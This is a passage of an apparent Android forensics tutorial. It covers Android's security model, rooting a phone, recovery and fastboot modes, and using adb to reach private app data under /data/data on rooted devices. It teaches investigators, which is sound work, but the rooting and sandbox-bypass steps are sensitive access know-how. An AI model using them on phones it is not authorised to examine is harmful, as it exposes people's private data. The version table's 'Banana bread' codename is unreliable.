<td style="border-bottom: solid #666666 0.5pt; border-left: solid #666666 0.5pt; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><a href="http://socialcompare.com/en/review/android-2-3-3" target="_top"><span style="font-size: 10pt;"><strong>Android 2.3.3</strong></span></a></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">Gingerbread</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;"> NA</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">NFC API improvements<br />
</span>
<span style="font-size: 10pt;">added unsecured Bluetooth sockets</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">2011 Feb 9</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">10</span></td>
</tr>
<tr style="background: #cccccc;">
<td style="border-bottom: solid #666666 0.5pt; border-left: solid #666666 0.5pt; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><a href="http://socialcompare.com/en/review/android-2-3" target="_top"><span style="font-size: 10pt;"><strong>Android 2.3</strong></span></a></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">Gingerbread</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">Improved copy/paste<br />
</span>
<span style="font-size: 10pt;">Improved power management<br />
</span><br />
<span style="font-size: 10pt;">Social networking features<br />
</span><br />
<span style="font-size: 10pt;">Near Field Communication support<br />
</span><br />
<span style="font-size: 10pt;">Native VoIP/SIP support<br />
</span><br />
<span style="font-size: 10pt;">Video call support</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">performance – concurrent garbage collection, faster event distribution, updated video drivers<br />
</span>
<span style="font-size: 10pt;">NDK – Native Asset Manager, Native Activities + event handling, khronos API<br />
</span><br />
<span style="font-size: 10pt;">strict mode debugging</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">2010 Dec 6</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">9</span></td>
</tr>
<tr>
<td style="border-bottom: solid #666666 0.5pt; border-left: solid #666666 0.5pt; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><a href="http://socialcompare.com/en/review/android-2-2" target="_top"><span style="font-size: 10pt;"><strong>Android 2.2</strong></span></a></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">Froyo</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">Speed improvements<br />
</span>
<span style="font-size: 10pt;">JIT implementation<br />
</span><br />
<span style="font-size: 10pt;">USB Tethering<br />
</span><br />
<span style="font-size: 10pt;">Applications installation to the expandable memory</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;"> NA</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">2010 May 20</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">8</span></td>
</tr>
<tr style="background: #cccccc;">
<td style="border-bottom: solid #666666 0.5pt; border-left: solid #666666 0.5pt; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><a href="http://socialcompare.com/en/review/android-2-0" target="_top"><span style="font-size: 10pt;"><strong>Android 2.0</strong></span></a></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">Éclair</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">Microsoft Exchange support<br />
</span>
<span style="font-size: 10pt;">Bluetooth 2.1</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;"> NA</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">2009 Oct 26</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">5</span></td>
</tr>
<tr>
<td style="border-bottom: solid #666666 0.5pt; border-left: solid #666666 0.5pt; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><a href="http://socialcompare.com/en/review/android-1-5" target="_top"><span style="font-size: 10pt;"><strong>Android 1.5</strong></span></a></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">Cupcake</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">Bluetooth A2DP, AVRCP support<br />
</span>
<span style="font-size: 10pt;">Record/watch videos</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;"> NA</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">2009 Apr 30</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">3</span></td>
</tr>
<tr style="background: #cccccc;">
<td style="border-bottom: solid #666666 0.5pt; border-left: solid #666666 0.5pt; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><a href="http://socialcompare.com/en/review/android1-1" target="_top"><span style="font-size: 10pt;"><strong>Android 1.1</strong></span></a></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">Banana bread</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">Ability to save MMS attachments</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;"> NA</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">2009 Feb 9</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">2</span></td>
</tr>
</tbody>
</table>
</div>
<h1>
Android Security</h1>
Android by default runs on Linux kernel. Linux kernel provides Android with following security features –<br />
<ol>
<li><strong>User-based permissions model</strong> – Android OS has
implemented permission model for individual apps. Applications must
declare a list of permissions they require in a file called
manifest.xml. When a user installs the application, Android presents
permission list to the user so that they can view the list to allow or
disallow the installation as shown below</li>
</ol>
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/072117_1317_PracticalAn1.png" /><br />
<strong>Note – We cannot install an android application with few
permissions. Either we have to accept all the permissions or decline to
install it.<br />
</strong><br />
<ol>
<li><strong>Application sandboxing – </strong>Android by default, make
use of Linux user-based protection model. Every android application is
assigned is a unique UID and is run as a different process. In Android,
by default, an application cannot access data of other application. So,
if an application tries to do something malicious, it can do within its
context and permission it has been assigned by the OS. <strong><br />
</strong></li>
<li><strong>SELinux in Android – </strong>From Android 4.3, SELinux (Security Enhanced Linux) is supported by Android. SE android uses <strong>MAC (Mandatory Access Control) </strong>which
ensures Application runs in an isolated environment. With SELinux
Android, if a user installs the malicious app, malware cannot access the
OS and corrupt the device. <strong><br />
</strong></li>
<li><strong>Application Signing – </strong>All android apps are signed
by the developer/owner to determine the author of the app. The key store
and private key which is used during signing need to be protected for
pushing a new update to the application. <strong><br />
</strong></li>
<li><strong>Secure interposes communication – </strong>As discussed
above, sandboxing is obtained between the processes using UID assigned
to the process. But if an application wants to access data of other
application using Intent or Content Provider it is done safely using
Binder Mechanism. Suppose Process “A” wants to access data of Process
“B.” “A” is the client, and “B” is the Service. <strong><br />
</strong></li>
</ol>
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/072117_1317_PracticalAn2.png" /><br />
All the request/interaction between Client and Service happens
through Proxy on Client side and Stub on Service Side. All the
request/interaction are monitored by the kernel for ensuring the
security.<br />
<h1>
Android Forensics Lab Setup</h1>
We assume the reader has installed and setup Android Studio, Android SDK, and Android Emulator. If not, please refer –<br />
<div style="margin-left: 21pt;">
For SDK –</div>
<div style="margin-left: 21pt;">
<a href="https://developer.android.com/studio/install.html">https://developer.android.com/studio/install.html</a></div>
<div style="margin-left: 21pt;">
For Android Emulator –</div>
<div style="margin-left: 21pt;">
<a href="https://developer.android.com/studio/run/emulator.html">https://developer.android.com/studio/run/emulator.html</a></div>
<div style="margin-left: 21pt;">
<a href="https://www.embarcadero.com/starthere/xe5/mobdevsetup/android/en/creating_an_android_emulator.html">https://www.embarcadero.com/starthere/xe5/mobdevsetup/android/en/creating_an_android_emulator.html</a></div>
In this paper, we are using Android 4.4<br />
<strong>Why we need Emulator – </strong>Emulator allows an investigator to understand how certain applications behave and how the installation of an<strong><br />
</strong>application affects the device. Another advantage is that you
can design an emulator with the desired version. This is especially
helpful when working with devices running on older versions of Android.<strong><br />
</strong><br />
<strong>Also, AVD comes with root as default.<br />
</strong><br />
<strong>Rooting Android Phone –</strong> Rooting is the process of
letting the users of Android phones gain the highest privilege i.e. Root
user privilege on an Android Phone. Android is based on Linux as
discussed. Thus, gaining root access is same as gaining root user access
or administrative access on Linux OS.<br />
Rooting is needed to understand the internals of the device. It also
helps to overcome the certain limitations and barrier in the
investigation. By rooting an Android device, you can alter or replace
system applications and settings, run specialized apps that require
administrator-level permissions or perform operations that are otherwise
inaccessible to a normal Android user.<br />
However, from a forensic point of view, the main reason for rooting
is to gain access to those parts of the system that are normally not
accessible. Most of the public root tools will result in a permanent
root. In this, the changes persist even after rebooting the device. In
the case of a temporary root, the changes are lost once the device
reboots. Temporary roots should always be preferred over permanent for
forensic investigation.<br />
<strong>Why Root an Android Phone – </strong>As discussed, in Android
each application is assigned a UID and is run as a separate process,
and each application is segregated so that one application does not
access the data of another application. UID’s assigned to the
application are stored in packages.XML file in <strong>/data/system</strong>
folder. This file, in addition to storing UIDs, stores the Android
permissions of each program as well. The private data of each
application is stored in the <strong>/data/data</strong> location and is
accessible only to that application. Hence, during the course of the
investigation, the data present at this location cannot be accessed if
the phone is not rooted since a normal user cannot access the
application data. However, rooting a phone will allow us to access the
data present in any location. Thus, it is necessary to root the Android
Phone.<br />
<strong>Recovery and Fastboot – </strong>It is necessary to understand recovery, bootloader, and<br />
<strong>Fastboot modes in Android</strong>. The following sections explain these in detail –<br />
<strong>Recovery Mode</strong> – Any Android phone has three main
partitions: boot loader, Android ROM, and recovery. The boot loader is
present in the first partition and is the first program that runs when
the phone is powered on.<br />
The primary role of the Boot Loader is to take care of low-level
hardware initialization and boot the device into other partitions. It
usually loads the Android partition, commonly called as Android ROM.
Android ROM contains all the operating system files that are necessary
to run the device. The recovery partition, commonly called as stock
recovery, is used to delete all user data and files or to perform system
updates.<br />
Example – When we do a factory reset on our phone, recovery boots up
and erases the files and data. Similarly, with updates, the phone boots
into the recovery mode to install the latest updates that are written to
the Android ROM partition. Hence, the recovery mode is the screen we
always see when we install any official update on the device.<br />
<strong>Screenshot</strong> – Stock Recovery Mode on Android<br />
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/072117_1317_PracticalAn3.png" /><br />
<em>Stock Recovery Mode Options</em><br />
The stock Android recovery is <strong>intentionally</strong> very
limited in functionality. It has the options to reboot the system, apply
updates from adb and SD card, factory reset, etc. However, custom
recovery offers many more options.<br />
<strong>Custom recovery – </strong>Custom recovery is a third-party
recovery environment. Flashing this recovery environment onto your
device replaces the default stock recovery environment with a
third-party, customized recovery environment. <strong><br />
</strong><br />
Most common features included in custom recovery:<br />
<ol>
<li>Full backup and restore functionality</li>
<li>Allow unsigned update packages or allow signed packages with custom keys</li>
<li>Selectively mounts device partitions and SD card</li>
<li>Provide USB mass storage access to SD card or data partitions</li>
<li>Provide full ADB access, with the ADB daemon running as root</li>
<li>Fully featured BusyBox binary (Busybox is a collection of powerful command-line tools in a single binary executable)</li>
</ol>
There are several custom recovery images available in the market
today, such as ClockworkMod Recovery, TeamWin Recovery Project, and so
on.<br />
Screenshot – Below screenshot shows the options available with ClockworkMod Recovery:<br />
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/072117_1317_PracticalAn4.jpg" /><br />
<em>Custom recovery Options</em><br />
<strong>Fastboot mode – </strong>Fastboot is a protocol which can be
used to reflash partitions on your device. It is one of the tools that
come along with the Android SDK. It is an alternative to the recovery
mode to do installations and updates and also to unlock the boot loader
in some cases. While in fastboot, you can modify the file system images
from a computer over a USB connection. Hence, it is one of the ways to
install the recovery images and just boot in some cases. Once the phone
is booted into fastboot, you can flash image files in the internal
memory. <strong><br />
</strong><br />
<strong>Locked and unlocked boot loaders – </strong>Boot loaders may
be locked or unlocked. Locked boot loaders do not allow us to perform
modifications to the device’s firmware by implementing restrictions at
the boot loader level. In other words, to run any recovery image or our
own operating system, the boot loader needs to be unlocked first.<br />
Some devices have ways to unlock them officially. For these devices,
the boot loader can be unlocked by putting the device into the fastboot
mode and running – “<strong>fastboot oem unlock command</strong>.” This will unlock the boot loader of the Android device.<br />
Some other manufacturers provide unlocking through different means,
for instance, through their websites and so on. The following screenshot
shows the HTC website providing support to unlock HTC devices:<br />
<div style="text-align: center;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/072117_1317_PracticalAn5.png" /></div>
<div style="text-align: center;">
<em>Unlocking Boot Loader from HTC Official Website<br />
</em></div>
<strong>How to Root </strong>– In this section, we will learn how to
Root an Android Phone. Gaining root access on a device with an unlocked
boot loader is very easy but gaining root access on a device with a
locked boot loader is not so straightforward.<br />
<strong>Rooting unlocked Boot-Loader </strong>– The process of rooting mainly involves copying the <strong>superuser </strong>(<strong>su</strong>) binary to a location in the current process’s path (/system/xbin/su) and granting it executable permissions with the <strong>chmod</strong> command. Hence, the first step here is to unlock the boot loader. As explained in the earlier<em><br />
</em>section, depending on the device manufacturer, unlocking a boot
loader can be done either through the fastboot mode or by following
vendor-specific boot loader unlock procedure. The su binary comes along
with an Android application, such as Superuser, that provides a
graphical prompt each time an application requests root access.<br />
In our case, we will root Lenovo mobile which I have with me. Rooting
steps for Android mobile will vary as per the mobile manufacturer so
the steps may vary from your mobile manufacturer. There are many tools
available for rooting any device, and it varies from a different
manufacturer. In our case, we will use Lenovo K3 Note Manager.<br />
<div style="text-align: center;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/072117_1317_PracticalAn6.jpg" /></div>
<div style="text-align: center;">
<em>Enabling USB Debugging<br />
</em></div>
<div style="text-align: center;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/072117_1317_PracticalAn7.png" /></div>
<div style="text-align: center;">
<em>Selecting Device on K3 Note Manager</em></div>
<div style="text-align: center;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/072117_1317_PracticalAn8.png" /></div>
<div style="text-align: center;">
<em>Device Connected Notification<br />
</em></div>
<div style="text-align: center;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/072117_1317_PracticalAn9.png" /></div>
<div style="text-align: center;">
<em>Rooting in Progress<br />
</em></div>
<div style="text-align: center;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/072117_1317_PracticalAn10.png" /></div>
<div style="text-align: center;">
<em>Rooting in Progress</em></div>
<div style="text-align: center;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/072117_1317_PracticalAn11.png" /></div>
<div style="text-align: center;">
<em>Device Rooted Successfully<br />
</em></div>
<div style="text-align: center;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/072117_1317_PracticalAn12.jpg" /></div>
<div style="text-align: center;">
<em>SuperSU Installed Successfully<br />
</em></div>
<div style="text-align: center;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/072117_1317_PracticalAn13.jpg" /></div>
<div style="text-align: center;">
<em>Root Access on device<br />
</em></div>
<strong>Note –</strong> From Android 4.1, a new feature called the
sideload mode has been introduced. This feature allows us to apply an
update zip over ADB without copying it to the device beforehand. To
sideload an update, run the adb sideload su-package.zip command, where
su-package.zip is the filename of the update package on your computer.
Alternately, you can also modify a factory image to add a su binary.
This can be done by unpacking an ext4 formatted system image, adding a
su binary, and repacking it. If this image is flashed, it will contain
the su binary, and the device will be rooted.<strong><br />
</strong><br />
<h1>
Data Storage on Android Devices</h1>
The main motive of forensic analysis is to extract necessary data
from the device. Hence, for effective forensic analysis, it is important
and necessary to know what kind of data is stored on the device, where
it is stored, how it is stored, and the details of the filesystems on
which the data is stored. This knowledge is very important to a forensic
analyst to make an informed decision about where to look for data and
the techniques that can be used to extract the data. In this section, we
will cover the following topics:<br />
<ol>
<li>Android partition layout and file hierarchy</li>
<li>Application data storage on the device</li>
<li>An overview of the Android filesystem</li>
<li>
<div>
<strong>Android partition layout and file hierarchy – </strong>The
partition layout varies between device manufacturers and versions.
However, few partitions are present in all the Android devices. Some of
the common partitions found in most of the Android devices.</div>
<ol>
<li><strong>Boot loader – </strong>This partition stores the phone’s
boot loader program. This program takes care of initializing the
low-level hardware when the phone boots. Thus, it is responsible for
booting the Android kernel and booting into other boot modes, such as
the recovery mode, download mode, and so on<strong><br />
</strong></li>
<li><strong>Boot – </strong>As the name suggests, this partition has the
information and files required for the phone to boot. It contains the
kernel and RAM disk. So, without this partition, the phone cannot start
its processes.<strong><br />
</strong></li>
<li><strong>Recovery – </strong>Recovery partition allows the device to
boot into the recovery console through which activities such as phone
updates and other maintenance operations are performed. For this
purpose, a minimal Android boot image is stored. This boot image serves
as a failsafe.<strong><br />
</strong></li>
<li><strong>Userdata – </strong>This partition is usually called the
data partition and is the device’s internal storage for application
data. A bulk of user data is stored here, and this is where most of our
forensic evidence will reside. It stores all app data and standard
communications as well.<strong><br />
</strong></li>
<li><strong>System – </strong>All the major components other than kernel
and RAM disk are present here. The Android system image here contains
the Android framework, libraries, system binaries, and preinstalled
applications. Without this partition, the device cannot boot into normal
mode.<strong><br />
</strong></li>
<li><strong>Cache – </strong>This partition is used to store frequently
accessed data and various other files, such as recovery logs and update
packages downloaded over the cellular network.<strong><br />
</strong></li>
<li><strong>Radio – </strong>Devices with telephony capabilities have a
baseband image stored in this partition that takes care of various
telephony activities.<strong><br />
</strong></li>
</ol>
</li>
</ol>
Android Debug Bridge(ADB) – In Android forensics, ADB plays an
important role. It is present in <sdk_path>/platform-tools folder.
For an example – C:\Android\SDK\platform-tools. There you will find an
executable called adb.exe as shown<br />
<div style="text-align: center;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/072117_1317_PracticalAn14.png" /></div>
Android Debug Bridge as the name suggests it acts as a bridge between
computer and the mobile phone. So, if we want to communicate with the
phone from the computer, we do it via ADB. I hope role of ADB is clear.
To work with ADB, USB debugging options should be enabled on the phone.
On Lenovo phone, it can be done by selecting developer option as shown
in the below figure<br />
<div style="text-align: center;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/072117_1317_PracticalAn15.jpg" /></div>
<div style="text-align: center;">
<em>Fig 1 –</em><br />
<em>Selecting Developer Options<br />
</em></div>
<div style="text-align: center;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/072117_1317_PracticalAn16.jpg" /></div>
<div style="text-align: center;">
<em>Fig 2 –</em><br />
<em>Enabling USB Debugging</em></div>
However, it will vary with other devices, and USB Debugging option should be enabled accordingly.<br />
Note – On some Smart Phones, the Developer options menu is hidden. It
can be turned on by tapping on the Build Number field in Settings >
About Device seven<em><br />
</em>times.<br />
ADB usually runs with a non-privilege shell account. Thus, it will
not provide access to internal application data. But on a rooted phone,
ADB will run with root shell account and provide access to internal
application data and OS files and folders.<br />
Using ADB to access the device – Connect the device to the computer.
After connecting the device to the computer and before issuing adb
commands, it is helpful to know whether the mobile phone is connected to
the adb server. This can be done using the “adb.exe” devices command.
This command lists out all the devices that are connected to the
computer, as shown in the following command. This will also list the
emulator if it is running at the time of issuing the command<br />
Command –<br />
C:\Program Files (x86)\Android\android-sdk\platform-tools>adb.exe devices<br />
List of devices attached<br />
4df16ac5115e4e04 device<br />
Issuing Shell Commands to the Mobile Phone – As stated above Android
runs on Linux and provides a way to access the shell. Using ADB, we can
access or gain a shell on Android Phone. Once we access or gain shell,
we can run most of the Linux commands. We can gain shell access on
mobile using adb.exe command as shown below –<br />
C:\Program Files (x86)\Android\android-sdk\platform-tools>adb.exe shell<br />
shell@android:/ $<br />
After executing a shell command, shell prompt is displayed to the
user. In this shell prompt, commands can be executed on the device. For
instance, as shown in the below command line, ls command can be used to
view all the files within a directory.<br />
C:\Program Files (x86)\Android\android-sdk\platform-tools>adb.exe shell<br />
shell@android:/ $ ls<br />
ls<br />
acct<br />
cache<br />
config<br />
dd<br />
ata<br />
default.prop<br />
dev<br />
efs<br />
etc<br />
factory<br />
fstab.smdk4x12<br />
Installing an Application – During the investigation, it may happen
that we need to install some applications on the device for extracting
data from the device. It can be done by issuing the command:<br />
adb.exe install name_of_the_application.apk<br />
Example –<br />
C:\Program Files (x86)\Android\android-sdk\platform-tools>adb.exe install test.apk<br />
4311 KB/s (13855934 bytes in 3.138s)<br />
pkg: /data/local/tmp/test.apk<br />
Success<br />
Pulling Data from Device – If there is any need to pull the data from the mobile, it can be done using adb pull command.<br />
Syntax – adb pull path_to_file_on_android_device path_to_file_on_local_computer<br />
Note – On a normal Android phone, we won’t be able to download all
the files using the adb pull command, because of the inherent security
features provided by the Android operating system.<br />
Example – Files present under the /data/data folder cannot be accessed on an Android device that is not rooted.<br />
Pushing data to the device – If there is any need to push the data to the mobile, it can be done using adb push command.<br />
Syntax – adb push path_to_file_on_local_computer path_to_file_on_android_device<br />
ADB on a rooted device – We have seen how the ADB tool can be used to
interact with the device and execute certain commands on the device.
However, on a normal Android phone, certain locations, such as<br />
/data/data, cannot be accessed.<br />
Example – The following command-line output appears when we try to access /data/data on a normal device:<br />
C:\Program Files (x86)\Android\android-sdk\platform-tools>adb.exe shell<br />
shell@android:/ $ cd /data/data<br />
cd /data/data<br />
shell@android:/data/data $ ls<br />
ls<br />
opendir failed, Permission denied<br />
This is because the private data of all the applications are stored
in this folder. Thus, the security is enforced by Android. Only the root
user has access to this location.<br />
Hence, on a rooted device, we will be able to see all the data from this location, as shown in the following commands:<br />
C:\Program Files (x86)\Android\android-sdk\platform-tools>adb.exe shell<br />
shell@android:/ # ls /data/data<br />
ls /data/data<br />
android.googleSearch.googleSearchWidget<br />
com.android.MtpApplication<br />
com.android.Preconfig<br />
com.android.apps.tag<br />
com.android.backupconfirm<br />
com.android.bluetooth<br />
com.android.browser<br />
com.android.calendar<br />
com.android.certinstaller<br />
com.android.chrome<br />
com.android.clipboardsaveservice<br />
com.android.contacts<br />
com.android.defcontainer<br />
com.android.email<br />
com.android.exchange<br />
com.android.facelock<br />
com.android.htmlviewer<br />
com.android.inputdevices<br />
com.android.keychain<br />
com.android.mms<br />
As shown in the above command, the private data of all the
applications can now be seen easily by navigating to the respective
folders. Hence, the ADB tool on a rooted device allows an examiner to
access all the data of applications installed on the device.<br />
Note<br />
Sometimes, even on a rooted phone, you will see the permission-denied
message. In such cases, after executing the adb shell command, try
entering the superuser mode by typing su. If the root is enabled, you
will see # without asking for a password.<br />
<h1>
Android file hierarchy</h1>
A basic understanding of how Android organizes its data in files and
folders helps a forensic analyst narrow down his research to specific
locations. If you are familiar with Unix-like systems, you will
understand the file hierarchy in Android very well. Based on the device
manufacturer and the underlying Linux version, the structure of this
hierarchy may have a few insignificant changes. To see the complete file
hierarchy, you need to have root access.<br />
Here is the sample screenshot –<br />
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/072117_1317_PracticalAn17.png" /><br />
<strong>Directories Overviews<br />
</strong><br />
<ol>
<li><strong>Acct – </strong>This is the mount point for the acct cgroup (control group) that provides for user accounting.<strong><br />
</strong></li>
<li><strong>Cache – </strong>This is the directory (/cache) where
Android stores frequently accessed data and app components. Wiping the
cache doesn’t affect your personal data, but simply deletes the existing
data there. There is also another directory in this folder called
lost+found. This directory holds recovered files (if any) in the event
of filesystem corruption, such as incorrectly removing the SD card
without unmounting it and so on. The cache may contain forensically
relevant artifacts, such as images, browsing history, and other app
data.<strong><br />
</strong></li>
<li><strong>d – </strong>This is a symbolic link to /sys/kernel/debug. This folder is used to mount the debugfs filesystem and to debug kernel.<strong><br />
</strong></li>
<li><strong>data – </strong>This is the partition that contains the data
of each application. Most of the data belonging to a user, such as the
contacts, SMS, dialed numbers, and so on, is stored in this folder. This
folder has significant importance from a forensic point of view as it
holds valuable data. The following screenshot shows the folders present
in this partition:</li>
</ol>
<div style="text-align: center;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/072117_1317_PracticalAn18.png" /></div>
<div style="margin-left: 36pt;">
Important sub-directories under data folder</div>
<ol>
<li><strong>dalvik-cache – </strong>This folder contains several logs that might be useful during the examination, depending on the underlying requirements.</li>
<li><strong>data – </strong>The /data/data partition contains the
private data of all the applications. Most of the data belonging to the
user are stored in this folder. This folder has significant importance
from a forensic point of view as it holds valuable data.<strong><br />
</strong></li>
<li><strong>dev – </strong>This directory contains special device files
for all the devices. This is the mount point for the tempfs filesystem.
This filesystem defines the devices available to the applications.<strong><br />
</strong></li>
<li><strong>init – </strong>When booting the Android kernel, the init program is executed. This program present under this folder.<strong><br />
</strong></li>
<li><strong>mnt – </strong>This directory serves as a mount point for all the filesystems, internal and external SD cards, and so on.<strong><br />
</strong></li>
<li><strong>proc – </strong>This is the mount point for the procfs
filesystem that provides access to the kernel data structures. Several
programs use /proc as the source for their information. It contains
files that have useful information about the processes.<strong><br />
</strong></li>
<li><strong>root – </strong>This is the home directory for the root account. This folder can be accessed only if the device is rooted.<strong><br />
</strong></li>
<li><strong>sbin – </strong>This contains binaries for several important daemons. This is not of much significance from a forensic perspective.<strong><br />
</strong></li>
<li><strong>misc – </strong>As the name suggests, this folder contains
information about miscellaneous settings. Information about hardware
settings, USB settings, and so on can be accessed from this folder.<strong><br />
</strong></li>
<li><strong>sdcard – </strong>This is the partition that contains the
data present on the SD card of the device.SD card can be either
removable storage or non-removable storage. Any app on your phone with
the WRITE_EXTERNAL_STORAGE permission may create files or folders in
this location. There are some default folders, such as android_secure,
Android, DCIM, media, and so on, present in most of the mobiles.<strong><br />
</strong></li>
<li><strong>Digital Camera Images </strong>(<strong>DCIM</strong>) – It
is the default directory structure for digital cameras, smartphones,
tablets, and related solid-state devices. Some tablets have a photos
folder that points to the same location. Within DCIM, you will find
photos you have taken, videos, and thumbnails (cache) files. Photos are
stored in /DCIM/Camera.</li>
<li><strong>system – </strong>This directory contains libraries, system
